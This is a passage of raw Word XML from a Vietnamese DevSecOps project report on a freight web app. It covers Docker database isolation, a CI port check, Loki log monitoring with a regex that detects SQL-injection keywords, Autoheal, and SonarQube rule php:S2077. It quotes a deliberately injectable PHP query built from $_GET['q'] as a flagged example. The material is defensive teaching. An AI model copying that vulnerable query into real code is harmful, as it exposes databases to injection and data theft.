      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, chỉ cho phép giao tiếp nội bộ thông qua mạng bridge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</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Phân tách tường minh định danh hai project: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, cấu hình script dọn dẹp an toàn container cũ mà vẫn bảo toàn 100% dữ liệu trên Docker Volume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>db_data</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Đoạn mã demo thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra cấu hình tự động trong `ci/validate_configs.py` và cấu hình mạng nội bộ cô lập trong `InlaneWeb/docker-compose.prod.yml`:</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1. Đoạn mã kiểm thử tự động trong ci/validate_configs.py:</w:t>
              <w:br/>
              <w:t xml:space="preserve">  # Thẩm định cấu hình Compose: cấm mở cổng 3306 ra ngoài máy chủ host</w:t>
              <w:br/>
              <w:t xml:space="preserve">  def validate_database_isolation(compose_path: str) -&gt; bool:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      with open(compose_path, "r", encoding="utf-8") as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">          config = yaml.safe_load(f)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      db_ports = config.get("services", {}).get("db", {}).get("ports", [])</w:t>
              <w:br/>
              <w:t xml:space="preserve">      for port_mapping in db_ports:</w:t>
              <w:br/>
              <w:t xml:space="preserve">          if "3306:3306" in str(port_mapping) or "0.0.0.0:3306" in str(port_mapping):</w:t>
              <w:br/>
              <w:t xml:space="preserve">              print(f"❌ VI PHẠM AN NINH: Cổng 3306 đang mở công khai trong {compose_path}!")</w:t>
              <w:br/>
              <w:t xml:space="preserve">              return False</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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2. Cấu hình mạng nội bộ cô lập trong InlaneWeb/docker-compose.prod.yml:</w:t>
              <w:br/>
              <w:t xml:space="preserve">  services:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    web:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      image: ${INLANEWEB_IMAGE}</w:t>
              <w:br/>
              <w:t xml:space="preserve">      container_name: ilfreight_web</w:t>
              <w:br/>
              <w:t xml:space="preserve">      networks:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - inlaneweb_net</w:t>
              <w:br/>
              <w:t xml:space="preserve">      # Chỉ mở cổng HTTP qua Reverse Proxy nội bộ</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ports:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - "8088:80"</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    db:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      image: ${INLANEWEB_DB_IMAGE}</w:t>
              <w:br/>
              <w:t xml:space="preserve">      container_name: ilfreight_db</w:t>
              <w:br/>
              <w:t xml:space="preserve">      # TUYỆT ĐỐI KHÔNG DÙNG ports: ["3306:3306"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      # Cổng 3306 chỉ mở trong mạng inlaneweb_net cho web kết nối</w:t>
              <w:br/>
              <w:t xml:space="preserve">      expose:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - "3306"</w:t>
              <w:br/>
              <w:t xml:space="preserve">      volumes:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - db_data:/var/lib/mysql</w:t>
              <w:br/>
              <w:t xml:space="preserve">      networks:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - inlaneweb_net</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  networks:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    inlaneweb_net:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      name: inlaneweb_net</w:t>
              <w:br/>
              <w:t xml:space="preserve">      external: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1.5. Thành viên 5 — Nguyễn Phương Mai: Thiếu hụt giám sát truy vết và ứng phó sự cố rò rỉ dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thành viên phụ trách:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nguyễn Phương Mai (Kỹ sư Vận hành &amp; Giám sát An ninh / SecOps &amp; Observability).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất vấn đề an toàn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hệ thống khi triển khai ban đầu thiếu cơ chế thu thập và phân tích nhật ký tập trung. Khi kẻ tấn công thực hiện các chiến dịch dò quét tự động hoặc cố gắng trích xuất dữ liệu trái phép, quản trị viên hoàn toàn không nhận được cảnh báo, dẫn tới hiện tượng "mù quan sát" (Blind Spot). Đồng thời, khi ứng dụng bị tấn công làm tràn bộ nhớ gây sập container, hệ thống không thể tự phục hồi nếu thiếu can thiệp thủ công của kỹ sư trực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân loại nhóm lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗi triển khai, vận hành và giám sát (Operations &amp; Incident Response).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha trong quy trình DevSecOps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha Operate / Monitor (Stage 4: Continuous Monitoring &amp; Self-Healing)</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thực thi kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Security-as-Code (Giám sát và Phản ứng an ninh dưới dạng mã nguồn)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Căn cứ vi phạm chính sách bảo vệ dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP — Điều 17 (Xử lý sự cố vi phạm dữ liệu cá nhân):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt buộc tổ chức phải thông báo cho Bộ Công an trong thời hạn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>72 giờ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> kể từ khi xảy ra sự cố vi phạm dữ liệu cá nhân. Nếu không có hệ thống ghi vết nhật ký tập trung để chứng minh phạm vi, thời điểm và số lượng bản ghi bị rò rỉ, doanh nghiệp hoàn toàn không thể lập biên bản điều tra sự cố theo đúng pháp luật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR — Article 33 &amp; Article 34:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bắt buộc năng lực phát hiện, khoanh vùng và thông báo vi phạm dữ liệu cá nhân (Personal Data Breach Notification) cho cơ quan có thẩm quyền trong vòng 72 giờ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triển khai cụm FOSS Observability bao gồm Promtail thu thập trực tiếp từ Docker Unix Socket, Grafana Loki lập chỉ mục và phân tích chuỗi log JSON theo thời gian thực. Sử dụng cú pháp LogQL bóc tách các dấu hiệu tấn công mạng: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Cú pháp LogQL phát hiện các đợt tấn công trích xuất dữ liệu SQLi theo thời gian thực</w:t>
              <w:br/>
              <w:t xml:space="preserve">  sum by (client_ip) (</w:t>
              <w:br/>
              <w:t xml:space="preserve">    count_over_time(</w:t>
              <w:br/>
              <w:t xml:space="preserve">      {container="ilfreight_web"} </w:t>
              <w:br/>
              <w:t xml:space="preserve">      | json </w:t>
              <w:br/>
              <w:t xml:space="preserve">      | uri =~ "(?i).*(union.*select|sleep\(|extractvalue|information_schema).*" [1m]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
              <w:t xml:space="preserve">  )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức xử lý và khắc phục:</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Trực quan hóa toàn bộ 8 phân vùng giám sát an ninh trên Bảng điều khiển Grafana tập trung (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://grafana.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), thiết lập cơ chế xác thực quản trị viên bảo mật (vô hiệu hóa Anonymous Access).</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Kích hoạt bộ điều phối tự phục hồi Autoheal giám sát nhịp tim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Khi phát hiện container bị sập hoặc treo tiến trình, Autoheal tự động khởi động lại container trong thời gian dưới 5 giây mà không làm gián đoạn cơ sở dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đoạn mã demo thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cấu hình tự phục hồi container trong `InlaneWeb/docker-compose.monitoring.yml`:</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autoheal:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    image: willfarrell/autoheal:1.2.0</w:t>
              <w:br/>
              <w:t xml:space="preserve">    container_name: ilfreight_autoheal</w:t>
              <w:br/>
              <w:t xml:space="preserve">    restart: always</w:t>
              <w:br/>
              <w:t xml:space="preserve">    environment:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - AUTOHEAL_CONTAINER_LABEL=autoheal</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - AUTOHEAL_INTERVAL=10</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - AUTOHEAL_START_PERIOD=30</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - AUTOHEAL_DEFAULT_STOP_TIMEOUT=10</w:t>
              <w:br/>
              <w:t xml:space="preserve">    volumes:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - /var/run/docker.sock:/var/run/docker.sock</w:t>
              <w:br/>
              <w:t xml:space="preserve">    networks:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      - inlaneweb_net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5.2. Các lỗi mã nguồn bị SonarQube chặn khi lập trình</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong đường ống CI/CD, SonarQube đóng vai trò là người gác cổng tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Stage 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (định nghĩa trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>.github/workflows/devsecops-pipeline.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">). Bất kỳ đoạn mã nguồn nào muốn được tích hợp vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đều phải vượt qua bộ chỉ số Quality Gate quy định tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube-quality-gate.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Dưới đây là 4 tình huống vi phạm điển hình mà SonarQube phát hiện và chặn đứng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2.1. Chặn câu lệnh SQL nối chuỗi nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hành vi vi phạm trong mã nguồn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Lập trình viên ghép trực tiếp biến người dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$_GET['q']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào chuỗi truy vấn cơ sở dữ liệu:</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Đoạn mã vi phạm do lập trình viên commit</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $query = "SELECT id, code, city, country, volume FROM ports WHERE code LIKE '%" . $_GET['q'] . "%'";</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $result = mysqli_query($conn, $query);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc vi phạm của SonarQube:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Động cơ phân tích cú pháp AST của SonarScanner kích hoạt quy tắc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã quy tắc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S2077</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"Formatting SQL queries is security-sensitive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân loại:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
